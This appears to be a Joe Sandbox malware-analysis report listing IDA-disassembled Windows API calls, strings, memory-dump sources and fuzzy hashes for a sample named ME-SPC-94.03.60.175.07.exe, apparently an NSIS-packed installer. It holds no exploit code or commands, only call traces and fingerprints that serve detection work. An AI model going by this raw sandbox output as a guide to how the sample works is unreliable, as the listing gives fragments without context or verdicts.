                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                  • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                  • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                  • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                  • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                  • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                  • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00405999
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,00403344,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 004059A3
                                                  • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405993
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 2659869361-2382934351
                                                  • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                  • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                  • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                  • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                  • String ID:
                                                  • API String ID: 1404258612-0
                                                  • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                  • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                  • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                  • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                  APIs
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                    • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                    • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                    • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsh56A9.tmp\System.dll), ref: 0040525F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                    • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                    • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                    • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 3585118688-0
                                                  • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                  • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                  • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                  • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405195
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                    • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                  • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                  • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                  • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                  • CloseHandle.KERNEL32(?), ref: 004056F5
                                                  Strings
                                                  • Error launching installer, xrefs: 004056D6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                  • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                  • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                  • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,00403861,771B3420,0040366C,?), ref: 004038A4
                                                  • GlobalFree.KERNEL32(?), ref: 004038AB
                                                  Strings
                                                  • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040389C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                  • API String ID: 1100898210-2382934351
                                                  • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                  • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                  • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                  • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 004059E5
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\ME-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 004059F5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-3976562730
                                                  • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                  • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                  • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                  • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                  • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                  • GlobalFree.KERNEL32(?), ref: 10001203
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1479157136.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000004.00000002.1479140415.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479171762.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000004.00000002.1479188233.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_10000000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                  • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                  • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                  • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                  • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                  • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                  • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1469880995.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.1469865596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469893743.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469904971.0000000000446000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1469991113.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B86
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B91
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BDB
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404BEE
                                                  • SetWindowLongW.USER32(?,000000FC,00405166), ref: 00404C07
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C1B
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C61
                                                  • DeleteObject.GDI32(00000000), ref: 00404C64
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D9F
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404DAD
                                                  • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404F35
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F59
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                  • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004050EF
                                                  • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                  • ShowWindow.USER32(00000000), ref: 0040514F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                  • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                  • Opcode Fuzzy Hash: eeda71b71a34d3a0b7ba0c5416e900ef86050f568373e52e0e63e9c387a85d2f
                                                  • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                  APIs
                                                  • #17.COMCTL32 ref: 00403379
                                                  • SetErrorMode.KERNEL32(00008001), ref: 00403384
                                                  • OleInitialize.OLE32(00000000), ref: 0040338B
                                                    • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                    • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                    • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                    • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                  • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                  • GetModuleHandleW.KERNEL32(00000000,00434000,00000000), ref: 004033DB
                                                  • CharNextW.USER32(00000000,00434000,00000020), ref: 00403403
                                                  • GetTempPathW.KERNEL32(00000400,00436800,00000000,?), ref: 0040353B
                                                  • GetWindowsDirectoryW.KERNEL32(00436800,000003FB), ref: 0040354C
                                                  • lstrcatW.KERNEL32(00436800,\Temp), ref: 00403558
                                                  • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp), ref: 0040356C
                                                  • lstrcatW.KERNEL32(00436800,Low), ref: 00403574
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low), ref: 00403585
